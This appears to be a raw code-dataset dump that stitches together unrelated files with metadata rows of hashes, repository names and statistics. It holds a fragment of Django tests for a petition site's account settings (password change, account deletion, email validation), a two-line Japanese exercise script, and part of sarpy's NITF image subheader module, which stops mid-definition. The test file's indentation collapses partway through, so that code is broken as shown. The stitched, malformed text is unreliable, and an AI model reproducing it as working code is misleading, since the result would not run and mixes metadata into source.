        username = "max"
        user = self.login(username)
        new_pass = 'eytksjezu375&#'
        data = {
            'password_change_form_submitted': 'yes',
            'old_password': username,  # fixture accounts appear to use the username as password -- TODO confirm against setUp
            'new_password1': new_pass,
            'new_password2': new_pass,
        }
        response = self.client.post(reverse("account_settings"), data)
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, "petition/account_settings.html")
        self.assertTemplateUsed(response, "layouts/base.html")
        self.assertEqual(response.context['user'], user)
        # only the password form was submitted, so only it is bound/valid
        self.assertEqual(response.context['update_info_form_submitted'], False)
        self.assertEqual(response.context['delete_account_form_submitted'], False)
        self.assertEqual(response.context['password_change_form_submitted'], True)
        self.assertEqual(response.context['update_info_form'].is_valid(), True)
        self.assertEqual(response.context['update_info_form'].is_bound, True)
        self.assertEqual(response.context['delete_account_form'].is_valid(), False)
        self.assertEqual(response.context['delete_account_form'].is_bound, False)
        self.assertEqual(response.context['password_change_form'].is_valid(), True)
        self.assertEqual(response.context['password_change_form'].is_bound, True)
        self.logout()
        # the new password must now authenticate and reach the dashboard ...
        self.login(username, password=new_pass)
        response2 = self.client.get(reverse("user_dashboard"))
        self.assertEqual(response2.status_code, 200)
        self.logout()
        # ... while the old (default) password must be bounced to the login page
        self.login(username)
        response3 = self.client.get(reverse("user_dashboard"), follow=True)
        self.assertRedirects(response3, reverse("login")+"?next="+reverse("user_dashboard"))
def test_UsermaxPOSTDeleteAccountOK(self):
with self.settings(INDEX_PAGE="ALL_PETITIONS"):
username = "max"
self.login(username)
data = {
'validation': "DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), True)
response = self.client.post(reverse("account_settings"), data, follow=True)
self.assertRedirects(response, reverse("all_petitions"))
self.assertTemplateUsed(response, "layouts/base.html")
self.logout()
try:
self.login(username)
response2 = self.client.get(reverse("user_dashboard"))
self.assertRedirects(response2, reverse("login")+"?next="+reverse("user_dashboard"))
self.assertEqual(0, 1) # Should never be reached
except:
pass # I expected that!
pu = PytitionUser.objects.filter(user__username=username).count()
self.assertEqual(pu, 0)
User = get_user_model()
u = User.objects.filter(username=username).count()
self.assertEqual(u, 0)
def test_UsermaxPOSTDeleteAccountValidNOK(self):
username = "max"
self.login(username)
data = {
'validation': "DO *NOT* DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), False)
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "layouts/base.html")
self.assertTemplateUsed(response, "petition/account_settings.html")
self.logout()
self.login(username)
response2 = self.client.get(reverse("user_dashboard"))
self.assertEqual(response2.status_code, 200)
pu = PytitionUser.objects.filter(user__username=username).count()
self.assertEqual(pu, 1)
User = get_user_model()
u = User.objects.filter(username=username).count()
self.assertEqual(u, 1)
def test_UserjuliaPOSTDeleteAccountValidNOK(self):
username = "julia"
self.login(username)
data = {
'validation': "DO *NOT* DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), False)
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "layouts/base.html")
self.assertTemplateUsed(response, "petition/account_settings.html")
self.logout()
self.login(username)
response2 = self.client.get(reverse("user_dashboard"))
self.assertEqual(response2.status_code, 200)
pu = PytitionUser.objects.filter(user__username=username).count()
self.assertEqual(pu, 1)
User = get_user_model()
u = User.objects.filter(username=username).count()
self.assertEqual(u, 1)
def test_UserjohnPOSTDeleteAccountValidNOK(self):
username = "john"
self.login(username)
data = {
'validation': "DO *NOT* DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), False)
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "layouts/base.html")
self.assertTemplateUsed(response, "petition/account_settings.html")
self.logout()
self.login(username)
response2 = self.client.get(reverse("user_dashboard"))
self.assertEqual(response2.status_code, 200)
pu = PytitionUser.objects.filter(user__username=username).count()
self.assertEqual(pu, 1)
User = get_user_model()
u = User.objects.filter(username=username).count()
self.assertEqual(u, 1)
def test_UsersarahPOSTDeleteAccountValidNOK(self):
username = "sarah"
self.login(username)
data = {
'validation': "DO *NOT* DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), False)
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "layouts/base.html")
self.assertTemplateUsed(response, "petition/account_settings.html")
self.logout()
self.login(username)
response2 = self.client.get(reverse("user_dashboard"))
self.assertEqual(response2.status_code, 200)
pu = PytitionUser.objects.filter(user__username=username).count()
self.assertEqual(pu, 1)
User = get_user_model()
u = User.objects.filter(username=username).count()
self.assertEqual(u, 1)
def test_UserUnauthenticatedPOST(self):
self.logout()
data = {
'validation': "DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), True)
response = self.client.post(reverse("account_settings"), data, follow=True)
self.assertRedirects(response, reverse("login")+"?next="+reverse("account_settings"))
self.assertTemplateUsed(response, "layouts/base.html")
def test_UserUnauthenticatedGET(self):
self.logout()
response = self.client.get(reverse("account_settings"), follow=True)
self.assertRedirects(response, reverse("login")+"?next="+reverse("account_settings"))
self.assertTemplateUsed(response, "layouts/base.html")
def test_UsermaxPOSTUpdateUserInfoEmailKO(self):
username = "max"
user = self.login(username)
initial_data = {
'first_name': user.user.first_name,
'last_name': user.user.last_name,
'email': "wrongEmailSyntax",
}
update_info_form = get_update_form(user.user, data=initial_data)
update_info_form.is_valid()
self.assertEqual(update_info_form.is_valid(), False)
data = update_info_form.cleaned_data
data.update({
'update_info_form_submitted': 'yes',
'email': "wrongEmailSyntax",
})
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], True)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), False)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
new_update_info_form = response.context['update_info_form']
self.assertIn('password_mismatch', new_update_info_form.error_messages)
self.assertIn('email', new_update_info_form.errors)
def test_UsersarahPOSTUpdateUserInfoEmailKO(self):
username = "sarah"
user = self.login(username)
initial_data = {
'first_name': user.user.first_name,
'last_name': user.user.last_name,
'email': "wrongEmailSyntax",
}
update_info_form = get_update_form(user.user, data=initial_data)
update_info_form.is_valid()
self.assertEqual(update_info_form.is_valid(), False)
data = update_info_form.cleaned_data
data.update({
'update_info_form_submitted': 'yes',
'email': "wrongEmailSyntax",
})
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], True)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), False)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
new_update_info_form = response.context['update_info_form']
self.assertIn('password_mismatch', new_update_info_form.error_messages)
self.assertIn('email', new_update_info_form.errors)
def test_UserjohnPOSTUpdateUserInfoEmailKO(self):
username = "john"
user = self.login(username)
initial_data = {
'first_name': user.user.first_name,
'last_name': user.user.last_name,
'email': "wrongEmailSyntax",
}
update_info_form = get_update_form(user.user, data=initial_data)
update_info_form.is_valid()
self.assertEqual(update_info_form.is_valid(), False)
data = update_info_form.cleaned_data
data.update({
'update_info_form_submitted': 'yes',
'email': "wrongEmailSyntax", # We put it again because invalid values are not part of cleaned_data
})
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], True)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), False)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
new_update_info_form = response.context['update_info_form']
self.assertIn('password_mismatch', new_update_info_form.error_messages)
self.assertIn('email', new_update_info_form.errors)
def test_UserjuliaPOSTUpdateUserInfoEmailKO(self):
username = "julia"
user = self.login(username)
initial_data = {
'first_name': user.user.first_name,
'last_name': user.user.last_name,
'email': "wrongEmailSyntax",
}
update_info_form = get_update_form(user.user, data=initial_data)
update_info_form.is_valid()
self.assertEqual(update_info_form.is_valid(), False)
data = update_info_form.cleaned_data
data.update({
'update_info_form_submitted': 'yes',
'email': "wrongEmailSyntax",
})
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], True)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), False)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
new_update_info_form = response.context['update_info_form']
self.assertIn('password_mismatch', new_update_info_form.error_messages)
self.assertIn('email', new_update_info_form.errors)
    def test_UsermaxPOSTPassChangeKOWrongOldPass(self):
        """A password-change attempt with a wrong old password is rejected:
        the page re-renders with a bound, invalid password form, and the
        original password keeps working.
        """
        username = "max"
        user = self.login(username)
        new_pass = 'eytksjezu375&#'
        data = {
            'password_change_form_submitted': 'yes',
            'old_password': 'WrongOldPass',  # deliberately incorrect
            'new_password1': new_pass,
            'new_password2': new_pass,
        }
        response = self.client.post(reverse("account_settings"), data)
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, "petition/account_settings.html")
        self.assertTemplateUsed(response, "layouts/base.html")
        self.assertEqual(response.context['user'], user)
        self.assertEqual(response.context['update_info_form_submitted'], False)
        self.assertEqual(response.context['delete_account_form_submitted'], False)
        self.assertEqual(response.context['password_change_form_submitted'], True)
        self.assertEqual(response.context['update_info_form'].is_valid(), True)
        self.assertEqual(response.context['update_info_form'].is_bound, True)
        self.assertEqual(response.context['delete_account_form'].is_valid(), False)
        self.assertEqual(response.context['delete_account_form'].is_bound, False)
        # the submitted form is bound but fails validation (bad old password)
        self.assertEqual(response.context['password_change_form'].is_valid(), False)
        self.assertEqual(response.context['password_change_form'].is_bound, True)
        self.logout()
        # the original password must still authenticate ...
        self.login(username)
        response2 = self.client.get(reverse("user_dashboard"))
        self.assertEqual(response2.status_code, 200)
        self.logout()
        # ... and the rejected new password must not
        self.login(username, password=new_pass)
        response3 = self.client.get(reverse("user_dashboard"), follow=True)
        self.assertRedirects(response3, reverse("login")+"?next="+reverse("user_dashboard"))
| 50.331234 | 110 | 0.672147 | 4,365 | 39,963 | 5.932417 | 0.046964 | 0.134968 | 0.169647 | 0.196949 | 0.919212 | 0.911296 | 0.907048 | 0.89106 | 0.884495 | 0.882255 | 0 | 0.006514 | 0.208618 | 39,963 | 793 | 111 | 50.394704 | 0.812275 | 0.015364 | 0 | 0.839838 | 0 | 0 | 0.193338 | 0.069082 | 0 | 0 | 0 | 0 | 0.41319 | 1 | 0.043069 | false | 0.131898 | 0.008075 | 0 | 0.053836 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 10 |
0ecb3bbc597ae4191ed7b7dd45ee486faa7fdeab | 112 | py | Python | ch01/ans07.py | upura/nlp100v2020 | 37d4d208d5d527d163356793b630f36eb7595779 | [
"MIT"
] | 66 | 2020-04-07T13:27:45.000Z | 2022-01-10T10:43:08.000Z | ch01/ans07.py | upura/nlp100v2020 | 37d4d208d5d527d163356793b630f36eb7595779 | [
"MIT"
] | 2 | 2021-04-30T21:11:02.000Z | 2022-01-13T02:33:08.000Z | ch01/ans07.py | upura/nlp100v2020 | 37d4d208d5d527d163356793b630f36eb7595779 | [
"MIT"
] | 12 | 2020-04-10T16:26:10.000Z | 2022-02-06T06:17:22.000Z | def generate_text(x, y, z):
    """Return the string "<x>時の<y>は<z>" (e.g. "12時の気温は22.4")."""
    return f'{x}時の{y}は{z}'


# Demo: prints "12時の気温は22.4" ("the temperature at 12 o'clock is 22.4").
x = 12
y = '気温'
z = 22.4
print(generate_text(x, y, z))
| 12.444444 | 29 | 0.5625 | 26 | 112 | 2.346154 | 0.576923 | 0.393443 | 0.42623 | 0.459016 | 0.491803 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056818 | 0.214286 | 112 | 8 | 30 | 14 | 0.636364 | 0 | 0 | 0 | 1 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0.166667 | 0.333333 | 0.166667 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 7 |
0ee0eab25ce452ff93366ecf77757b5b4fd4dec0 | 54,666 | py | Python | sarpy/io/general/nitf_elements/image.py | spacefan/sarpy | 2791af86b568c8a8560275aee426a4718d5a4606 | [
"MIT"
] | null | null | null | sarpy/io/general/nitf_elements/image.py | spacefan/sarpy | 2791af86b568c8a8560275aee426a4718d5a4606 | [
"MIT"
] | null | null | null | sarpy/io/general/nitf_elements/image.py | spacefan/sarpy | 2791af86b568c8a8560275aee426a4718d5a4606 | [
"MIT"
] | null | null | null | """
The image subheader definitions.
"""
__classification__ = "UNCLASSIFIED"
__author__ = "Thomas McCullough"
import logging
import struct
from collections import OrderedDict
from typing import Union
import numpy
from .base import NITFElement, NITFLoop, UserHeaderType, _IntegerDescriptor,\
_StringDescriptor, _StringEnumDescriptor, _NITFElementDescriptor, _parse_str
from .security import NITFSecurityTags, NITFSecurityTags0
logger = logging.getLogger(__name__)
######
# General components
class ImageBand(NITFElement):
    """
    Single image band, part of the image bands collection.

    The fixed-length fields are handled by descriptors; the variable-length
    LUT data (`LUTD`) is serialized/parsed explicitly, because its length
    depends on the NLUTS/NELUTS values that prefix it.
    """

    _ordering = ('IREPBAND', 'ISUBCAT', 'IFC', 'IMFLT', 'LUTD')
    # fixed serialized lengths; LUTD is variable-length and handled explicitly
    _lengths = {'IREPBAND': 2, 'ISUBCAT': 6, 'IFC': 1, 'IMFLT': 3}
    IREPBAND = _StringDescriptor(
        'IREPBAND', True, 2, default_value='',
        docstring='Representation. This field shall contain a valid indicator of the processing '
                  'required to display the nth band of the image with regard to the general image type '
                  'as recorded in the `IREP` field. The significance of each band in the image can be '
                  'derived from the combination of the `ICAT`, and `ISUBCAT` fields. Valid values of '
                  'the `IREPBAND` field depend on the value of '
                  'the `IREP` field.')  # type: str
    ISUBCAT = _StringDescriptor(
        'ISUBCAT', True, 6, default_value='',
        docstring='Subcategory. The purpose of this field is to provide the significance of the band '
                  'of the image with regard to the specific category (`ICAT` field) '
                  'of the overall image.')  # type: str
    IFC = _StringEnumDescriptor(
        'IFC', True, 1, {'N', }, default_value='N',
        docstring=' Image Filter Condition.')  # type: str
    IMFLT = _StringDescriptor(
        'IMFLT', True, 3, default_value='',
        docstring='Standard Image Filter Code. This field is reserved '
                  'for future use.')  # type: str

    def __init__(self, **kwargs):
        # LUTD bypasses the descriptor machinery (variable-length field)
        self._LUTD = None
        super(ImageBand, self).__init__(**kwargs)

    @classmethod
    def minimum_length(cls):
        # 2 (IREPBAND) + 6 (ISUBCAT) + 1 (IFC) + 3 (IMFLT) + 1 (NLUTS digit)
        return 13

    @property
    def LUTD(self):
        """
        The Look-up Table (LUT) data.

        Returns
        -------
        None|numpy.ndarray
        """

        return self._LUTD

    @LUTD.setter
    def LUTD(self, value):
        if value is None:
            self._LUTD = None
            return

        if not isinstance(value, numpy.ndarray):
            raise TypeError('LUTD must be a numpy array')
        if value.dtype.name != 'uint8':
            raise ValueError('LUTD must be a numpy array of dtype uint8, got {}'.format(value.dtype.name))
        if value.ndim != 2:
            raise ValueError('LUTD must be a two-dimensional array')
        # axis 0 limit: NLUTS serializes as a single digit (and <= 4 here)
        if value.shape[0] > 4:
            raise ValueError(
                'The number of LUTD bands (axis 0) must be 4 or fewer. '
                'Got LUTD shape {}'.format(value.shape))
        # axis 1 limit: NELUTS serializes as a 5-digit field
        if value.shape[1] > 65536:
            raise ValueError(
                'The number of LUTD elemnts (axis 1) must be 65536 or fewer. '
                'Got LUTD shape {}'.format(value.shape))
        self._LUTD = value

    @property
    def NLUTS(self):
        """
        Number of LUTS for the Image Band. This field shall contain the number
        of LUTs associated with the nth band of the image. LUTs are allowed
        only if the value of the `PVTYPE` field is :code:`INT` or :code:`B`.

        Returns
        -------
        int
        """

        # derived from the LUTD array shape; 0 when no LUT data is present
        return 0 if self._LUTD is None else self._LUTD.shape[0]

    @property
    def NELUTS(self):
        """
        Number of LUT Entries for the Image Band. This field shall contain
        the number of entries in each of the LUTs for the nth image band.

        Returns
        -------
        int
        """

        return 0 if self._LUTD is None else self._LUTD.shape[1]

    def _get_attribute_bytes(self, attribute):
        # serialize LUTD as: NLUTS (1 digit), then - if nonzero -
        # NELUTS (5 digits) followed by the raw table bytes
        if attribute == 'LUTD':
            if self.NLUTS == 0:
                out = b'0'
            else:
                out = '{0:d}{1:05d}'.format(self.NLUTS, self.NELUTS).encode() + \
                      struct.pack('{}B'.format(self.NLUTS * self.NELUTS), *self.LUTD.flatten())
            return out
        else:
            return super(ImageBand, self)._get_attribute_bytes(attribute)

    def _get_attribute_length(self, attribute):
        # must mirror _get_attribute_bytes: 1 byte when no LUTs, otherwise
        # 6 header bytes plus the table payload
        if attribute == 'LUTD':
            nluts = self.NLUTS
            if nluts == 0:
                return 1
            else:
                neluts = self.NELUTS
                return 6 + nluts * neluts
        else:
            return super(ImageBand, self)._get_attribute_length(attribute)

    @classmethod
    def _parse_attribute(cls, fields, attribute, value, start):
        # inverse of _get_attribute_bytes for the variable-length LUTD field
        if attribute == 'LUTD':
            loc = start
            nluts = int(value[loc:loc + 1])
            loc += 1
            if nluts == 0:
                fields['LUTD'] = None
            else:
                neluts = int(value[loc:loc + 5])
                loc += 5
                siz = nluts * neluts
                lutd = numpy.array(
                    struct.unpack('{}B'.format(siz), value[loc:loc + siz]), dtype=numpy.uint8).reshape(
                    (nluts, neluts))
                fields['LUTD'] = lutd
                loc += siz
            return loc
        return super(ImageBand, cls)._parse_attribute(fields, attribute, value, start)
class ImageBands(NITFLoop):
    """The looped collection of image bands."""

    _child_class = ImageBand
    _count_size = 1

    @classmethod
    def _parse_count(cls, value, start):
        # A single-digit count of 0 signals that the real (5-digit) count
        # immediately follows.
        offset = start + cls._count_size
        count = int(value[start:offset])
        if count == 0:
            count = int(value[offset:offset + 5])
            offset += 5
        return count, offset

    def _counts_bytes(self):
        band_count = len(self.values)
        if band_count > 9:
            # extended form: literal 0 followed by the 5-digit count
            return '0{0:05d}'.format(band_count).encode()
        return '{0:1d}'.format(band_count).encode()
class ImageComment(NITFElement):
    """A single image comment - an 80-character free-form string."""

    _ordering = ('COMMENT', )
    _lengths = {'COMMENT': 80}
    COMMENT = _StringDescriptor('COMMENT', True, 80, default_value='', docstring='The image comment')
class ImageComments(NITFLoop):
    """The looped collection of image comments; the serialized count occupies one digit."""

    _child_class = ImageComment
    _count_size = 1
########
# Masked image header - this is a binary structure
class MaskSubheader(NITFElement):
    """
    The mask subheader for a masked image segment. Unlike most NITF header
    elements this is a *binary* structure - the fixed fields serialize per
    `_binary_format`, and the mask arrays/pixel code are raw big-endian bytes.
    """

    _ordering = (
        'IMDATOFF', 'BMRLNTH', 'TMRLNTH', 'TPXCDLNTH', 'TPXCD', 'BMR', 'TMR')
    # byte lengths of the fixed binary fields
    _lengths = {
        'IMDATOFF': 4, 'BMRLNTH': 2, 'TMRLNTH': 2, 'TPXCDLNTH': 2}
    # big-endian struct codes for the fixed binary fields
    _binary_format = {
        'IMDATOFF': '>I', 'BMRLNTH': '>H', 'TMRLNTH': '>H', 'TPXCDLNTH': '>H'}
    # descriptors
    IMDATOFF = _IntegerDescriptor(
        'IMDATOFF', True, 10,
        docstring='Blocked image data offset. This is the size of the masked subheader '
                  'in bytes.')  # type: int
    BMRLNTH = _IntegerDescriptor(
        'BMRLNTH', True, 5,
        docstring='Block mask record length')  # type: int
    TMRLNTH = _IntegerDescriptor(
        'TMRLNTH', True, 5,
        docstring='Transparent Pixel Mask Record Length')  # type: int
    TPXCDLNTH = _IntegerDescriptor(
        'TPXCDLNTH', True, 5,
        docstring='Transparent Output Pixel Code Length in bits.')  # type: int

    def __init__(self, band_depth=1, blocks=1, **kwargs):
        """
        Parameters
        ----------
        band_depth : int
            The number of band elements; > 1 only for band-sequential data.
        blocks : int
            The number of image blocks.
        kwargs
            The field values.
        """

        self._band_depth = band_depth
        self._blocks = blocks
        # variable-length members are handled explicitly, not via descriptors
        self._TPXCD = None
        self._BMR = None
        self._TMR = None
        super(MaskSubheader, self).__init__(**kwargs)

    @property
    def band_depth(self):
        """
        int: The number of band elements. Will only be > 1 if band-sequential format.
        """

        return self._band_depth

    @property
    def blocks(self):
        """
        int: The number of blocks.
        """

        return self._blocks

    @property
    def TPXCD(self):
        """
        bytes: The Transparent output pixel code.
        """

        return self._TPXCD

    @TPXCD.setter
    def TPXCD(self, value):
        # when TPXCDLNTH is 0 there is no pixel code, regardless of input
        if self.TPXCDLNTH == 0:
            self._TPXCD = None
            return

        if not isinstance(value, bytes):
            raise TypeError('TPXCD must be of type bytes.')
        # length must agree with TPXCDLNTH (bits rounded up to whole bytes)
        expected_length = self._get_attribute_length('TPXCD')
        if len(value) != expected_length:
            raise ValueError(
                'Provided TPXCD data is required to be of length {}, '
                'but got length {}'.format(expected_length, len(value)))
        self._TPXCD = value

    @property
    def BMR(self):
        # type: () -> Union[None, numpy.ndarray]
        """
        None|numpy.ndarray: The block mask records array. This will be None if
        and only if `BMRLNTH=0`
        """

        return self._BMR

    @BMR.setter
    def BMR(self, value):
        # presence of the array must be consistent with BMRLNTH (0 or 4)
        if value is None:
            if self.BMRLNTH != 0:
                raise ValueError('BMR array is None, but BMRLNTH={}'.format(self.BMRLNTH))
            self._BMR = None
        else:
            if self.BMRLNTH != 4:
                raise ValueError('BMR array is provided, but BMRLNTH={}'.format(self.BMRLNTH))
            if not isinstance(value, numpy.ndarray):
                value = numpy.array(value, dtype='uint32')
            # one record per (band element, block)
            if value.shape != (self.band_depth, self.blocks):
                raise ValueError(
                    'BMR array is of shape {}, and must be of '
                    'shape {}'.format(value.shape, (self.band_depth, self.blocks)))
            if value.dtype.name != 'uint32':
                raise ValueError(
                    'BMR array has dtype {}, and must be of '
                    'dtype uint32'.format(value.dtype.name))
            self._BMR = value

    @property
    def TMR(self):
        # type: () -> Union[None, numpy.ndarray]
        """
        None|numpy.ndarray: The transparent mask records array. This will be None if
        and only if `TMRLNTH=0`
        """

        return self._TMR

    @TMR.setter
    def TMR(self, value):
        # mirrors the BMR setter, keyed off TMRLNTH instead
        if value is None:
            if self.TMRLNTH != 0:
                raise ValueError('TMR array is None, but TMRLNTH={}'.format(self.TMRLNTH))
            self._TMR = None
        else:
            if self.TMRLNTH != 4:
                raise ValueError('TMR array is provided, but TMRLNTH={}'.format(self.TMRLNTH))
            if not isinstance(value, numpy.ndarray):
                value = numpy.array(value, dtype='uint32')
            if value.shape != (self.band_depth, self.blocks):
                raise ValueError(
                    'TMR array is of shape {}, and must be of '
                    'shape {}'.format(value.shape, (self.band_depth, self.blocks)))
            if value.dtype.name != 'uint32':
                raise ValueError(
                    'TMR array has dtype {}, and must be of '
                    'dtype uint32'.format(value.dtype.name))
            self._TMR = value

    @staticmethod
    def define_tpxcd_length(tpxcdlnth):
        """
        Gets the appropriate length for the TPXCD data.

        Parameters
        ----------
        tpxcdlnth : int
            The TPXCDLNTH value (in bits).

        Returns
        -------
        int
            The TPXCD byte length: the bit count rounded up to whole bytes.
        """

        missing = (tpxcdlnth % 8)
        if missing == 0:
            return int(tpxcdlnth/8)
        else:
            return int((tpxcdlnth + (8 - missing))/8)

    @classmethod
    def _parse_attribute(cls, fields, attribute, value, start):
        # the three variable-length members depend on previously parsed
        # fields (BMRLNTH/TMRLNTH/TPXCDLNTH) and the band_depth/blocks sizing
        if attribute == 'BMR':
            if fields['BMRLNTH'] == 0:
                fields['BMR'] = None
                return start
            else:
                count = fields['band_depth']*fields['blocks']
                end = start+4*count
                array = numpy.array(struct.unpack('>{}I'.format(count), value[start:end]), dtype='uint32')
                fields['BMR'] = numpy.resize(array, (fields['band_depth'], fields['blocks']))
                return end
        elif attribute == 'TMR':
            if fields['TMRLNTH'] == 0:
                fields['TMR'] = None
                return start
            else:
                count = fields['band_depth']*fields['blocks']
                end = start+4*count
                array = numpy.array(struct.unpack('>{}I'.format(count), value[start:end]), dtype='uint32')
                fields['TMR'] = numpy.resize(array, (fields['band_depth'], fields['blocks']))
                return end
        elif attribute == 'TPXCD':
            length = cls.define_tpxcd_length(fields['TPXCDLNTH'])
            if length == 0:
                fields['TPXCD'] = None
                return start
            else:
                end = start + length
                fields['TPXCD'] = value[start:end]
                return end
        else:
            return super(MaskSubheader, cls)._parse_attribute(fields, attribute, value, start)

    def _get_attribute_length(self, fld):
        # variable-length members: 4 bytes per mask record, rounded-up bytes
        # for the pixel code; everything else defers to the base class
        if fld in ['BMR', 'TMR']:
            value = getattr(self, fld)
            if value is None:
                return 0
            else:
                return value.size*4
        elif fld == 'TPXCD':
            return self.define_tpxcd_length(self.TPXCDLNTH)
        else:
            return super(MaskSubheader, self)._get_attribute_length(fld)

    def _get_attribute_bytes(self, fld):
        # serialize the mask arrays as big-endian uint32 records, row-major
        if fld in ['BMR', 'TMR']:
            value = getattr(self, fld)
            if value is None:
                return b''
            else:
                return struct.pack('>{}I'.format(value.size), *numpy.reshape(value, (-1,)))
        elif fld == 'TPXCD':
            if self._TPXCD is None:
                return b''
            return self._TPXCD
        else:
            return super(MaskSubheader, self)._get_attribute_bytes(fld)

    @classmethod
    def from_bytes(cls, value, start, band_depth=1, blocks=1):
        """
        Deserialize a MaskSubheader from a bytes buffer, starting at the
        given offset; `band_depth` and `blocks` size the mask record arrays.
        Logs an error if round-trip serialization would not reproduce the
        consumed byte count.
        """

        fields = {
            'band_depth': band_depth, 'blocks': blocks}
        loc = start
        for fld in cls._ordering:
            loc = cls._parse_attribute(fields, fld, value, loc)
        out = cls(**fields)
        # round-trip length sanity check
        input_length = len(value)-start
        out_length = out.get_bytes_length()
        if input_length != out_length:
            logger.error(
                'The MaskSubheader object is being serialized from a bytes buffer of length {},\n\t'
                'but would serialize to a bytes object of length {}.\n\t'
                'This is likely a result of faulty serialization,\n\t '
                'and represents an error.'.format(input_length, out_length))
        return out

    def to_json(self):
        # JSON-friendly representation; mask arrays become nested lists
        out = OrderedDict([('band_depth', self.band_depth), ('blocks', self.blocks)])
        for fld in self._ordering:
            value = getattr(self, fld)
            if value is None:
                continue
            if fld in ['BMR', 'TMR']:
                out[fld] = value.tolist()
            else:
                out[fld] = value
        return out
#########
# NITF 2.1 version
class ImageSegmentHeader(NITFElement):
"""
The image segment header - see standards document MIL-STD-2500C for more
information.
"""
_ordering = (
'IM', 'IID1', 'IDATIM', 'TGTID',
'IID2', 'Security', 'ENCRYP', 'ISORCE',
'NROWS', 'NCOLS', 'PVTYPE', 'IREP',
'ICAT', 'ABPP', 'PJUST', 'ICORDS',
'IGEOLO', 'Comments', 'IC', 'COMRAT', 'Bands',
'ISYNC', 'IMODE', 'NBPR', 'NBPC', 'NPPBH',
'NPPBV', 'NBPP', 'IDLVL', 'IALVL',
'ILOC', 'IMAG', 'UserHeader', 'ExtendedHeader')
_lengths = {
'IM': 2, 'IID1': 10, 'IDATIM': 14, 'TGTID': 17,
'IID2': 80, 'ENCRYP': 1, 'ISORCE': 42,
'NROWS': 8, 'NCOLS': 8, 'PVTYPE': 3, 'IREP': 8,
'ICAT': 8, 'ABPP': 2, 'PJUST': 1, 'ICORDS': 1,
